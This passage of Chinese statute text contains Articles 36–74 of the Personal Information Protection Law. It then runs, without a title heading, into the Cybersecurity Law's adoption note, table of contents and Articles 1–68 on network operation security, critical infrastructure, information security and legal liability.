第三十六条 国家机关处理的个人信息应当在中华人民共和国境内存储；确需向境外提供的，应当进行安全评估。安全评估可以要求有关部门提供支持与协助。

第三十七条 法律、法规授权的具有管理公共事务职能的组织为履行法定职责处理个人信息，适用本法关于国家机关处理个人信息的规定。

第三章 个人信息跨境提供的规则

第三十八条 个人信息处理者因业务等需要，确需向中华人民共和国境外提供个人信息的，应当具备下列条件之一：

（一）依照本法第四十条的规定通过国家网信部门组织的安全评估；

（二）按照国家网信部门的规定经专业机构进行个人信息保护认证；

（三）按照国家网信部门制定的标准合同与境外接收方订立合同，约定双方的权利和义务；

（四）法律、行政法规或者国家网信部门规定的其他条件。

中华人民共和国缔结或者参加的国际条约、协定对向中华人民共和国境外提供个人信息的条件等有规定的，可以按照其规定执行。

个人信息处理者应当采取必要措施，保障境外接收方处理个人信息的活动达到本法规定的个人信息保护标准。

第三十九条 个人信息处理者向中华人民共和国境外提供个人信息的，应当向个人告知境外接收方的名称或者姓名、联系方式、处理目的、处理方式、个人信息的种类以及个人向境外接收方行使本法规定权利的方式和程序等事项，并取得个人的单独同意。

第四十条 关键信息基础设施运营者和处理个人信息达到国家网信部门规定数量的个人信息处理者，应当将在中华人民共和国境内收集和产生的个人信息存储在境内。确需向境外提供的，应当通过国家网信部门组织的安全评估；法律、行政法规和国家网信部门规定可以不进行安全评估的，从其规定。

第四十一条 中华人民共和国主管机关根据有关法律和中华人民共和国缔结或者参加的国际条约、协定，或者按照平等互惠原则，处理外国司法或者执法机构关于提供存储于境内个人信息的请求。非经中华人民共和国主管机关批准，个人信息处理者不得向外国司法或者执法机构提供存储于中华人民共和国境内的个人信息。

第四十二条 境外的组织、个人从事侵害中华人民共和国公民的个人信息权益，或者危害中华人民共和国国家安全、公共利益的个人信息处理活动的，国家网信部门可以将其列入限制或者禁止个人信息提供清单，予以公告，并采取限制或者禁止向其提供个人信息等措施。

第四十三条 任何国家或者地区在个人信息保护方面对中华人民共和国采取歧视性的禁止、限制或者其他类似措施的，中华人民共和国可以根据实际情况对该国家或者地区对等采取措施。

第四章 个人在个人信息处理活动中的权利

第四十四条 个人对其个人信息的处理享有知情权、决定权，有权限制或者拒绝他人对其个人信息进行处理；法律、行政法规另有规定的除外。

第四十五条 个人有权向个人信息处理者查阅、复制其个人信息；有本法第十八条第一款、第三十五条规定情形的除外。

个人请求查阅、复制其个人信息的，个人信息处理者应当及时提供。

个人请求将个人信息转移至其指定的个人信息处理者，符合国家网信部门规定条件的，个人信息处理者应当提供转移的途径。

第四十六条 个人发现其个人信息不准确或者不完整的，有权请求个人信息处理者更正、补充。

个人请求更正、补充其个人信息的，个人信息处理者应当对其个人信息予以核实，并及时更正、补充。

第四十七条 有下列情形之一的，个人信息处理者应当主动删除个人信息；个人信息处理者未删除的，个人有权请求删除：

（一）处理目的已实现、无法实现或者为实现处理目的不再必要；

（二）个人信息处理者停止提供产品或者服务，或者保存期限已届满；

（三）个人撤回同意；

（四）个人信息处理者违反法律、行政法规或者违反约定处理个人信息；

（五）法律、行政法规规定的其他情形。

法律、行政法规规定的保存期限未届满，或者删除个人信息从技术上难以实现的，个人信息处理者应当停止除存储和采取必要的安全保护措施之外的处理。

第四十八条 个人有权要求个人信息处理者对其个人信息处理规则进行解释说明。

第四十九条 自然人死亡的，其近亲属为了自身的合法、正当利益，可以对死者的相关个人信息行使本章规定的查阅、复制、更正、删除等权利；死者生前另有安排的除外。

第五十条 个人信息处理者应当建立便捷的个人行使权利的申请受理和处理机制。拒绝个人行使权利的请求的，应当说明理由。

个人信息处理者拒绝个人行使权利的请求的，个人可以依法向人民法院提起诉讼。

第五章 个人信息处理者的义务

第五十一条 个人信息处理者应当根据个人信息的处理目的、处理方式、个人信息的种类以及对个人权益的影响、可能存在的安全风险等，采取下列措施确保个人信息处理活动符合法律、行政法规的规定，并防止未经授权的访问以及个人信息泄露、篡改、丢失：

（一）制定内部管理制度和操作规程；

（二）对个人信息实行分类管理；

（三）采取相应的加密、去标识化等安全技术措施；

（四）合理确定个人信息处理的操作权限，并定期对从业人员进行安全教育和培训；

（五）制定并组织实施个人信息安全事件应急预案；

（六）法律、行政法规规定的其他措施。

第五十二条 处理个人信息达到国家网信部门规定数量的个人信息处理者应当指定个人信息保护负责人，负责对个人信息处理活动以及采取的保护措施等进行监督。

个人信息处理者应当公开个人信息保护负责人的联系方式，并将个人信息保护负责人的姓名、联系方式等报送履行个人信息保护职责的部门。

第五十三条 本法第三条第二款规定的中华人民共和国境外的个人信息处理者，应当在中华人民共和国境内设立专门机构或者指定代表，负责处理个人信息保护相关事务，并将有关机构的名称或者代表的姓名、联系方式等报送履行个人信息保护职责的部门。

第五十四条 个人信息处理者应当定期对其处理个人信息遵守法律、行政法规的情况进行合规审计。

第五十五条 有下列情形之一的，个人信息处理者应当事前进行个人信息保护影响评估，并对处理情况进行记录：

（一）处理敏感个人信息；

（二）利用个人信息进行自动化决策；

（三）委托处理个人信息、向其他个人信息处理者提供个人信息、公开个人信息；

（四）向境外提供个人信息；

（五）其他对个人权益有重大影响的个人信息处理活动。

第五十六条 个人信息保护影响评估应当包括下列内容：

（一）个人信息的处理目的、处理方式等是否合法、正当、必要；

（二）对个人权益的影响及安全风险；

（三）所采取的保护措施是否合法、有效并与风险程度相适应。

个人信息保护影响评估报告和处理情况记录应当至少保存三年。

第五十七条 发生或者可能发生个人信息泄露、篡改、丢失的，个人信息处理者应当立即采取补救措施，并通知履行个人信息保护职责的部门和个人。通知应当包括下列事项：

（一）发生或者可能发生个人信息泄露、篡改、丢失的信息种类、原因和可能造成的危害；

（二）个人信息处理者采取的补救措施和个人可以采取的减轻危害的措施；

（三）个人信息处理者的联系方式。

个人信息处理者采取措施能够有效避免信息泄露、篡改、丢失造成危害的，个人信息处理者可以不通知个人；履行个人信息保护职责的部门认为可能造成危害的，有权要求个人信息处理者通知个人。

第五十八条 提供重要互联网平台服务、用户数量巨大、业务类型复杂的个人信息处理者，应当履行下列义务：

（一）按照国家规定建立健全个人信息保护合规制度体系，成立主要由外部成员组成的独立机构对个人信息保护情况进行监督；

（二）遵循公开、公平、公正的原则，制定平台规则，明确平台内产品或者服务提供者处理个人信息的规范和保护个人信息的义务；

（三）对严重违反法律、行政法规处理个人信息的平台内的产品或者服务提供者，停止提供服务；

（四）定期发布个人信息保护社会责任报告，接受社会监督。

第五十九条 接受委托处理个人信息的受托人，应当依照本法和有关法律、行政法规的规定，采取必要措施保障所处理的个人信息的安全，并协助个人信息处理者履行本法规定的义务。

第六章 履行个人信息保护职责的部门

第六十条 国家网信部门负责统筹协调个人信息保护工作和相关监督管理工作。国务院有关部门依照本法和有关法律、行政法规的规定，在各自职责范围内负责个人信息保护和监督管理工作。

县级以上地方人民政府有关部门的个人信息保护和监督管理职责，按照国家有关规定确定。

前两款规定的部门统称为履行个人信息保护职责的部门。

第六十一条 履行个人信息保护职责的部门履行下列个人信息保护职责：

（一）开展个人信息保护宣传教育，指导、监督个人信息处理者开展个人信息保护工作；

（二）接受、处理与个人信息保护有关的投诉、举报；

（三）组织对应用程序等个人信息保护情况进行测评，并公布测评结果；

（四）调查、处理违法个人信息处理活动；

（五）法律、行政法规规定的其他职责。

第六十二条 国家网信部门统筹协调有关部门依据本法推进下列个人信息保护工作：

（一）制定个人信息保护具体规则、标准；

（二）针对小型个人信息处理者、处理敏感个人信息以及人脸识别、人工智能等新技术、新应用，制定专门的个人信息保护规则、标准；

（三）支持研究开发和推广应用安全、方便的电子身份认证技术，推进网络身份认证公共服务建设；

（四）推进个人信息保护社会化服务体系建设，支持有关机构开展个人信息保护评估、认证服务；

（五）完善个人信息保护投诉、举报工作机制。

第六十三条 履行个人信息保护职责的部门履行个人信息保护职责，可以采取下列措施：

（一）询问有关当事人，调查与个人信息处理活动有关的情况；

（二）查阅、复制当事人与个人信息处理活动有关的合同、记录、账簿以及其他有关资料；

（三）实施现场检查，对涉嫌违法的个人信息处理活动进行调查；

（四）检查与个人信息处理活动有关的设备、物品；对有证据证明是用于违法个人信息处理活动的设备、物品，向本部门主要负责人书面报告并经批准，可以查封或者扣押。

履行个人信息保护职责的部门依法履行职责，当事人应当予以协助、配合，不得拒绝、阻挠。

第六十四条 履行个人信息保护职责的部门在履行职责中，发现个人信息处理活动存在较大风险或者发生个人信息安全事件的，可以按照规定的权限和程序对该个人信息处理者的法定代表人或者主要负责人进行约谈，或者要求个人信息处理者委托专业机构对其个人信息处理活动进行合规审计。个人信息处理者应当按照要求采取措施，进行整改，消除隐患。

履行个人信息保护职责的部门在履行职责中，发现违法处理个人信息涉嫌犯罪的，应当及时移送公安机关依法处理。

第六十五条 任何组织、个人有权对违法个人信息处理活动向履行个人信息保护职责的部门进行投诉、举报。收到投诉、举报的部门应当依法及时处理，并将处理结果告知投诉、举报人。

履行个人信息保护职责的部门应当公布接受投诉、举报的联系方式。

第七章 法律责任

第六十六条 违反本法规定处理个人信息，或者处理个人信息未履行本法规定的个人信息保护义务的，由履行个人信息保护职责的部门责令改正，给予警告，没收违法所得，对违法处理个人信息的应用程序，责令暂停或者终止提供服务；拒不改正的，并处一百万元以下罚款；对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。

有前款规定的违法行为，情节严重的，由省级以上履行个人信息保护职责的部门责令改正，没收违法所得，并处五千万元以下或者上一年度营业额百分之五以下罚款，并可以责令暂停相关业务或者停业整顿、通报有关主管部门吊销相关业务许可或者吊销营业执照；对直接负责的主管人员和其他直接责任人员处十万元以上一百万元以下罚款，并可以决定禁止其在一定期限内担任相关企业的董事、监事、高级管理人员和个人信息保护负责人。

第六十七条 有本法规定的违法行为的，依照有关法律、行政法规的规定记入信用档案，并予以公示。

第六十八条 国家机关不履行本法规定的个人信息保护义务的，由其上级机关或者履行个人信息保护职责的部门责令改正；对直接负责的主管人员和其他直接责任人员依法给予处分。

履行个人信息保护职责的部门的工作人员玩忽职守、滥用职权、徇私舞弊，尚不构成犯罪的，依法给予处分。

第六十九条 处理个人信息侵害个人信息权益造成损害，个人信息处理者不能证明自己没有过错的，应当承担损害赔偿等侵权责任。

前款规定的损害赔偿责任按照个人因此受到的损失或者个人信息处理者因此获得的利益确定；个人因此受到的损失和个人信息处理者因此获得的利益难以确定的，根据实际情况确定赔偿数额。

第七十条 个人信息处理者违反本法规定处理个人信息，侵害众多个人的权益的，人民检察院、法律规定的消费者组织和由国家网信部门确定的组织可以依法向人民法院提起诉讼。

第七十一条 违反本法规定，构成违反治安管理行为的，依法给予治安管理处罚；构成犯罪的，依法追究刑事责任。

第八章 附 则

第七十二条 自然人因个人或者家庭事务处理个人信息的，不适用本法。

法律对各级人民政府及其有关部门组织实施的统计、档案管理活动中的个人信息处理有规定的，适用其规定。

第七十三条 本法下列用语的含义：

（一）个人信息处理者，是指在个人信息处理活动中自主决定处理目的、处理方式的组织、个人。

（二）自动化决策，是指通过计算机程序自动分析、评估个人的行为习惯、兴趣爱好或者经济、健康、信用状况等，并进行决策的活动。

（三）去标识化，是指个人信息经过处理，使其在不借助额外信息的情况下无法识别特定自然人的过程。

（四）匿名化，是指个人信息经过处理无法识别特定自然人且不能复原的过程。

第七十四条 本法自2021年11月1日起施行。****

（2016年11月7日第十二届全国人民代表大会常务委员会第二十四次会议通过）

目 录

第一章 总 则

第二章 网络安全支持与促进

第三章 网络运行安全

第一节 一般规定

第二节 关键信息基础设施的运行安全

第四章 网络信息安全

第五章 监测预警与应急处置

第六章 法律责任

第七章 附 则

第一章 总 则

第一条 为了保障网络安全，维护网络空间主权和国家安全、社会公共利益，保护公民、法人和其他组织的合法权益，促进经济社会信息化健康发展，制定本法。

第二条 在中华人民共和国境内建设、运营、维护和使用网络，以及网络安全的监督管理，适用本法。

第三条 国家坚持网络安全与信息化发展并重，遵循积极利用、科学发展、依法管理、确保安全的方针，推进网络基础设施建设和互联互通，鼓励网络技术创新和应用，支持培养网络安全人才，建立健全网络安全保障体系，提高网络安全保护能力。

第四条 国家制定并不断完善网络安全战略，明确保障网络安全的基本要求和主要目标，提出重点领域的网络安全政策、工作任务和措施。

第五条 国家采取措施，监测、防御、处置来源于中华人民共和国境内外的网络安全风险和威胁，保护关键信息基础设施免受攻击、侵入、干扰和破坏，依法惩治网络违法犯罪活动，维护网络空间安全和秩序。

第六条 国家倡导诚实守信、健康文明的网络行为，推动传播社会主义核心价值观，采取措施提高全社会的网络安全意识和水平，形成全社会共同参与促进网络安全的良好环境。

第七条 国家积极开展网络空间治理、网络技术研发和标准制定、打击网络违法犯罪等方面的国际交流与合作，推动构建和平、安全、开放、合作的网络空间，建立多边、民主、透明的网络治理体系。

第八条 国家网信部门负责统筹协调网络安全工作和相关监督管理工作。国务院电信主管部门、公安部门和其他有关机关依照本法和有关法律、行政法规的规定，在各自职责范围内负责网络安全保护和监督管理工作。

县级以上地方人民政府有关部门的网络安全保护和监督管理职责，按照国家有关规定确定。

第九条 网络运营者开展经营和服务活动，必须遵守法律、行政法规，尊重社会公德，遵守商业道德，诚实信用，履行网络安全保护义务，接受政府和社会的监督，承担社会责任。

第十条 建设、运营网络或者通过网络提供服务，应当依照法律、行政法规的规定和国家标准的强制性要求，采取技术措施和其他必要措施，保障网络安全、稳定运行，有效应对网络安全事件，防范网络违法犯罪活动，维护网络数据的完整性、保密性和可用性。

第十一条 网络相关行业组织按照章程，加强行业自律，制定网络安全行为规范，指导会员加强网络安全保护，提高网络安全保护水平，促进行业健康发展。

第十二条 国家保护公民、法人和其他组织依法使用网络的权利，促进网络接入普及，提升网络服务水平，为社会提供安全、便利的网络服务，保障网络信息依法有序自由流动。

任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益，煽动颠覆国家政权、推翻社会主义制度，煽动分裂国家、破坏国家统一，宣扬恐怖主义、极端主义，宣扬民族仇恨、民族歧视，传播暴力、淫秽色情信息，编造、传播虚假信息扰乱经济秩序和社会秩序，以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

第十三条 国家支持研究开发有利于未成年人健康成长的网络产品和服务，依法惩治利用网络从事危害未成年人身心健康的活动，为未成年人提供安全、健康的网络环境。

第十四条 任何个人和组织有权对危害网络安全的行为向网信、电信、公安等部门举报。收到举报的部门应当及时依法作出处理；不属于本部门职责的，应当及时移送有权处理的部门。

有关部门应当对举报人的相关信息予以保密，保护举报人的合法权益。

第二章 网络安全支持与促进

第十五条 国家建立和完善网络安全标准体系。国务院标准化行政主管部门和国务院其他有关部门根据各自的职责，组织制定并适时修订有关网络安全管理以及网络产品、服务和运行安全的国家标准、行业标准。

国家支持企业、研究机构、高等学校、网络相关行业组织参与网络安全国家标准、行业标准的制定。

第十六条 国务院和省、自治区、直辖市人民政府应当统筹规划，加大投入，扶持重点网络安全技术产业和项目，支持网络安全技术的研究开发和应用，推广安全可信的网络产品和服务，保护网络技术知识产权，支持企业、研究机构和高等学校等参与国家网络安全技术创新项目。

第十七条 国家推进网络安全社会化服务体系建设，鼓励有关企业、机构开展网络安全认证、检测和风险评估等安全服务。

第十八条 国家鼓励开发网络数据安全保护和利用技术，促进公共数据资源开放，推动技术创新和经济社会发展。

国家支持创新网络安全管理方式，运用网络新技术，提升网络安全保护水平。

第十九条 各级人民政府及其有关部门应当组织开展经常性的网络安全宣传教育，并指导、督促有关单位做好网络安全宣传教育工作。

大众传播媒介应当有针对性地面向社会进行网络安全宣传教育。

第二十条 国家支持企业和高等学校、职业学校等教育培训机构开展网络安全相关教育与培训，采取多种方式培养网络安全人才，促进网络安全人才交流。

第三章 网络运行安全

第一节 一般规定

第二十一条 国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求，履行下列安全保护义务，保障网络免受干扰、破坏或者未经授权的访问，防止网络数据泄露或者被窃取、篡改：

（一）制定内部安全管理制度和操作规程，确定网络安全负责人，落实网络安全保护责任；

（二）采取防范计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施；

（三）采取监测、记录网络运行状态、网络安全事件的技术措施，并按照规定留存相关的网络日志不少于六个月；

（四）采取数据分类、重要数据备份和加密等措施；

（五）法律、行政法规规定的其他义务。

第二十二条 网络产品、服务应当符合相关国家标准的强制性要求。网络产品、服务的提供者不得设置恶意程序；发现其网络产品、服务存在安全缺陷、漏洞等风险时，应当立即采取补救措施，按照规定及时告知用户并向有关主管部门报告。

网络产品、服务的提供者应当为其产品、服务持续提供安全维护；在规定或者当事人约定的期限内，不得终止提供安全维护。

网络产品、服务具有收集用户信息功能的，其提供者应当向用户明示并取得同意；涉及用户个人信息的，还应当遵守本法和有关法律、行政法规关于个人信息保护的规定。

第二十三条 网络关键设备和网络安全专用产品应当按照相关国家标准的强制性要求，由具备资格的机构安全认证合格或者安全检测符合要求后，方可销售或者提供。国家网信部门会同国务院有关部门制定、公布网络关键设备和网络安全专用产品目录，并推动安全认证和安全检测结果互认，避免重复认证、检测。

第二十四条 网络运营者为用户办理网络接入、域名注册服务，办理固定电话、移动电话等入网手续，或者为用户提供信息发布、即时通讯等服务，在与用户签订协议或者确认提供服务时，应当要求用户提供真实身份信息。用户不提供真实身份信息的，网络运营者不得为其提供相关服务。

国家实施网络可信身份战略，支持研究开发安全、方便的电子身份认证技术，推动不同电子身份认证之间的互认。

第二十五条 网络运营者应当制定网络安全事件应急预案，及时处置系统漏洞、计算机病毒、网络攻击、网络侵入等安全风险；在发生危害网络安全的事件时，立即启动应急预案，采取相应的补救措施，并按照规定向有关主管部门报告。

第二十六条 开展网络安全认证、检测、风险评估等活动，向社会发布系统漏洞、计算机病毒、网络攻击、网络侵入等网络安全信息，应当遵守国家有关规定。

第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

第二十八条 网络运营者应当为公安机关、国家安全机关依法维护国家安全和侦查犯罪的活动提供技术支持和协助。

第二十九条 国家支持网络运营者之间在网络安全信息收集、分析、通报和应急处置等方面进行合作，提高网络运营者的安全保障能力。

有关行业组织建立健全本行业的网络安全保护规范和协作机制，加强对网络安全风险的分析评估，定期向会员进行风险警示，支持、协助会员应对网络安全风险。

第三十条 网信部门和有关部门在履行网络安全保护职责中获取的信息，只能用于维护网络安全的需要，不得用于其他用途。

第二节 关键信息基础设施的运行安全

第三十一条 国家对公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务等重要行业和领域，以及其他一旦遭到破坏、丧失功能或者数据泄露，可能严重危害国家安全、国计民生、公共利益的关键信息基础设施，在网络安全等级保护制度的基础上，实行重点保护。关键信息基础设施的具体范围和安全保护办法由国务院制定。

国家鼓励关键信息基础设施以外的网络运营者自愿参与关键信息基础设施保护体系。

第三十二条 按照国务院规定的职责分工，负责关键信息基础设施安全保护工作的部门分别编制并组织实施本行业、本领域的关键信息基础设施安全规划，指导和监督关键信息基础设施运行安全保护工作。

第三十三条 建设关键信息基础设施应当确保其具有支持业务稳定、持续运行的性能，并保证安全技术措施同步规划、同步建设、同步使用。

第三十四条 除本法第二十一条的规定外，关键信息基础设施的运营者还应当履行下列安全保护义务：

（一）设置专门安全管理机构和安全管理负责人，并对该负责人和关键岗位的人员进行安全背景审查；

（二）定期对从业人员进行网络安全教育、技术培训和技能考核；

（三）对重要系统和数据库进行容灾备份；

（四）制定网络安全事件应急预案，并定期进行演练；

（五）法律、行政法规规定的其他义务。

第三十五条 关键信息基础设施的运营者采购网络产品和服务，可能影响国家安全的，应当通过国家网信部门会同国务院有关部门组织的国家安全审查。

第三十六条 关键信息基础设施的运营者采购网络产品和服务，应当按照规定与提供者签订安全保密协议，明确安全和保密义务与责任。

第三十七条 关键信息基础设施的运营者在中华人民共和国境内运营中收集和产生的个人信息和重要数据应当在境内存储。因业务需要，确需向境外提供的，应当按照国家网信部门会同国务院有关部门制定的办法进行安全评估；法律、行政法规另有规定的，依照其规定。

第三十八条 关键信息基础设施的运营者应当自行或者委托网络安全服务机构对其网络的安全性和可能存在的风险每年至少进行一次检测评估，并将检测评估情况和改进措施报送相关负责关键信息基础设施安全保护工作的部门。

第三十九条 国家网信部门应当统筹协调有关部门对关键信息基础设施的安全保护采取下列措施：

（一）对关键信息基础设施的安全风险进行抽查检测，提出改进措施，必要时可以委托网络安全服务机构对网络存在的安全风险进行检测评估；

（二）定期组织关键信息基础设施的运营者进行网络安全应急演练，提高应对网络安全事件的水平和协同配合能力；

（三）促进有关部门、关键信息基础设施的运营者以及有关研究机构、网络安全服务机构等之间的网络安全信息共享；

（四）对网络安全事件的应急处置与网络功能的恢复等，提供技术支持和协助。

第四章 网络信息安全

第四十条 网络运营者应当对其收集的用户信息严格保密，并建立健全用户信息保护制度。

第四十一条 网络运营者收集、使用个人信息，应当遵循合法、正当、必要的原则，公开收集、使用规则，明示收集、使用信息的目的、方式和范围，并经被收集者同意。

网络运营者不得收集与其提供的服务无关的个人信息，不得违反法律、行政法规的规定和双方的约定收集、使用个人信息，并应当依照法律、行政法规的规定和与用户的约定，处理其保存的个人信息。

第四十二条 网络运营者不得泄露、篡改、毁损其收集的个人信息；未经被收集者同意，不得向他人提供个人信息。但是，经过处理无法识别特定个人且不能复原的除外。

网络运营者应当采取技术措施和其他必要措施，确保其收集的个人信息安全，防止信息泄露、毁损、丢失。在发生或者可能发生个人信息泄露、毁损、丢失的情况时，应当立即采取补救措施，按照规定及时告知用户并向有关主管部门报告。

第四十三条 个人发现网络运营者违反法律、行政法规的规定或者双方的约定收集、使用其个人信息的，有权要求网络运营者删除其个人信息；发现网络运营者收集、存储的其个人信息有错误的，有权要求网络运营者予以更正。网络运营者应当采取措施予以删除或者更正。

第四十四条 任何个人和组织不得窃取或者以其他非法方式获取个人信息，不得非法出售或者非法向他人提供个人信息。

第四十五条 依法负有网络安全监督管理职责的部门及其工作人员，必须对在履行职责中知悉的个人信息、隐私和商业秘密严格保密，不得泄露、出售或者非法向他人提供。

第四十六条 任何个人和组织应当对其使用网络的行为负责，不得设立用于实施诈骗，传授犯罪方法，制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组，不得利用网络发布涉及实施诈骗，制作或者销售违禁物品、管制物品以及其他违法犯罪活动的信息。

第四十七条 网络运营者应当加强对其用户发布的信息的管理，发现法律、行政法规禁止发布或者传输的信息的，应当立即停止传输该信息，采取消除等处置措施，防止信息扩散，保存有关记录，并向有关主管部门报告。

第四十八条 任何个人和组织发送的电子信息、提供的应用软件，不得设置恶意程序，不得含有法律、行政法规禁止发布或者传输的信息。

电子信息发送服务提供者和应用软件下载服务提供者，应当履行安全管理义务，知道其用户有前款规定行为的，应当停止提供服务，采取消除等处置措施，保存有关记录，并向有关主管部门报告。

第四十九条 网络运营者应当建立网络信息安全投诉、举报制度，公布投诉、举报方式等信息，及时受理并处理有关网络信息安全的投诉和举报。

网络运营者对网信部门和有关部门依法实施的监督检查，应当予以配合。

第五十条 国家网信部门和有关部门依法履行网络信息安全监督管理职责，发现法律、行政法规禁止发布或者传输的信息的，应当要求网络运营者停止传输，采取消除等处置措施，保存有关记录；对来源于中华人民共和国境外的上述信息，应当通知有关机构采取技术措施和其他必要措施阻断传播。

第五章 监测预警与应急处置

第五十一条 国家建立网络安全监测预警和信息通报制度。国家网信部门应当统筹协调有关部门加强网络安全信息收集、分析和通报工作，按照规定统一发布网络安全监测预警信息。

第五十二条 负责关键信息基础设施安全保护工作的部门，应当建立健全本行业、本领域的网络安全监测预警和信息通报制度，并按照规定报送网络安全监测预警信息。

第五十三条 国家网信部门协调有关部门建立健全网络安全风险评估和应急工作机制，制定网络安全事件应急预案，并定期组织演练。

负责关键信息基础设施安全保护工作的部门应当制定本行业、本领域的网络安全事件应急预案，并定期组织演练。

网络安全事件应急预案应当按照事件发生后的危害程度、影响范围等因素对网络安全事件进行分级，并规定相应的应急处置措施。

第五十四条 网络安全事件发生的风险增大时，省级以上人民政府有关部门应当按照规定的权限和程序，并根据网络安全风险的特点和可能造成的危害，采取下列措施：

（一）要求有关部门、机构和人员及时收集、报告有关信息，加强对网络安全风险的监测；

（二）组织有关部门、机构和专业人员，对网络安全风险信息进行分析评估，预测事件发生的可能性、影响范围和危害程度；

（三）向社会发布网络安全风险预警，发布避免、减轻危害的措施。

第五十五条 发生网络安全事件，应当立即启动网络安全事件应急预案，对网络安全事件进行调查和评估，要求网络运营者采取技术措施和其他必要措施，消除安全隐患，防止危害扩大，并及时向社会发布与公众有关的警示信息。

第五十六条 省级以上人民政府有关部门在履行网络安全监督管理职责中，发现网络存在较大安全风险或者发生安全事件的，可以按照规定的权限和程序对该网络的运营者的法定代表人或者主要负责人进行约谈。网络运营者应当按照要求采取措施，进行整改，消除隐患。

第五十七条 因网络安全事件，发生突发事件或者生产安全事故的，应当依照《中华人民共和国突发事件应对法》、《中华人民共和国安全生产法》等有关法律、行政法规的规定处置。

第五十八条 因维护国家安全和社会公共秩序，处置重大突发社会安全事件的需要，经国务院决定或者批准，可以在特定区域对网络通信采取限制等临时措施。

第六章 法律责任

第五十九条 网络运营者不履行本法第二十一条、第二十五条规定的网络安全保护义务的，由有关主管部门责令改正，给予警告；拒不改正或者导致危害网络安全等后果的，处一万元以上十万元以下罚款，对直接负责的主管人员处五千元以上五万元以下罚款。

关键信息基础设施的运营者不履行本法第三十三条、第三十四条、第三十六条、第三十八条规定的网络安全保护义务的，由有关主管部门责令改正，给予警告；拒不改正或者导致危害网络安全等后果的，处十万元以上一百万元以下罚款，对直接负责的主管人员处一万元以上十万元以下罚款。

第六十条 违反本法第二十二条第一款、第二款和第四十八条第一款规定，有下列行为之一的，由有关主管部门责令改正，给予警告；拒不改正或者导致危害网络安全等后果的，处五万元以上五十万元以下罚款，对直接负责的主管人员处一万元以上十万元以下罚款：

（一）设置恶意程序的；

（二）对其产品、服务存在的安全缺陷、漏洞等风险未立即采取补救措施，或者未按照规定及时告知用户并向有关主管部门报告的；

（三）擅自终止为其产品、服务提供安全维护的。

第六十一条 网络运营者违反本法第二十四条第一款规定，未要求用户提供真实身份信息，或者对不提供真实身份信息的用户提供相关服务的，由有关主管部门责令改正；拒不改正或者情节严重的，处五万元以上五十万元以下罚款，并可以由有关主管部门责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照，对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。

第六十二条 违反本法第二十六条规定，开展网络安全认证、检测、风险评估等活动，或者向社会发布系统漏洞、计算机病毒、网络攻击、网络侵入等网络安全信息的，由有关主管部门责令改正，给予警告；拒不改正或者情节严重的，处一万元以上十万元以下罚款，并可以由有关主管部门责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照，对直接负责的主管人员和其他直接责任人员处五千元以上五万元以下罚款。

第六十三条 违反本法第二十七条规定，从事危害网络安全的活动，或者提供专门用于从事危害网络安全活动的程序、工具，或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助，尚不构成犯罪的，由公安机关没收违法所得，处五日以下拘留，可以并处五万元以上五十万元以下罚款；情节较重的，处五日以上十五日以下拘留，可以并处十万元以上一百万元以下罚款。

单位有前款行为的，由公安机关没收违法所得，处十万元以上一百万元以下罚款，并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。

违反本法第二十七条规定，受到治安管理处罚的人员，五年内不得从事网络安全管理和网络运营关键岗位的工作；受到刑事处罚的人员，终身不得从事网络安全管理和网络运营关键岗位的工作。

第六十四条 网络运营者、网络产品或者服务的提供者违反本法第二十二条第三款、第四十一条至第四十三条规定，侵害个人信息依法得到保护的权利的，由有关主管部门责令改正，可以根据情节单处或者并处警告、没收违法所得、处违法所得一倍以上十倍以下罚款，没有违法所得的，处一百万元以下罚款，对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款；情节严重的，并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照。

违反本法第四十四条规定，窃取或者以其他非法方式获取、非法出售或者非法向他人提供个人信息，尚不构成犯罪的，由公安机关没收违法所得，并处违法所得一倍以上十倍以下罚款，没有违法所得的，处一百万元以下罚款。

第六十五条 关键信息基础设施的运营者违反本法第三十五条规定，使用未经安全审查或者安全审查未通过的网络产品或者服务的，由有关主管部门责令停止使用，处采购金额一倍以上十倍以下罚款；对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。

第六十六条 关键信息基础设施的运营者违反本法第三十七条规定，在境外存储网络数据，或者向境外提供网络数据的，由有关主管部门责令改正，给予警告，没收违法所得，处五万元以上五十万元以下罚款，并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照；对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。

第六十七条 违反本法第四十六条规定，设立用于实施违法犯罪活动的网站、通讯群组，或者利用网络发布涉及实施违法犯罪活动的信息，尚不构成犯罪的，由公安机关处五日以下拘留，可以并处一万元以上十万元以下罚款；情节较重的，处五日以上十五日以下拘留，可以并处五万元以上五十万元以下罚款。关闭用于实施违法犯罪活动的网站、通讯群组。

单位有前款行为的，由公安机关处十万元以上五十万元以下罚款，并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。

第六十八条 网络运营者违反本法第四十七条规定，对法律、行政法规禁止发布或者传输的信息未停止传输、采取消除等处置措施、保存有关记录的，由有关主管部门责令改正，给予警告，没收违法所得；拒不改正或者情节严重的，处十万元以上五十万元以下罚款，并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照，对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。

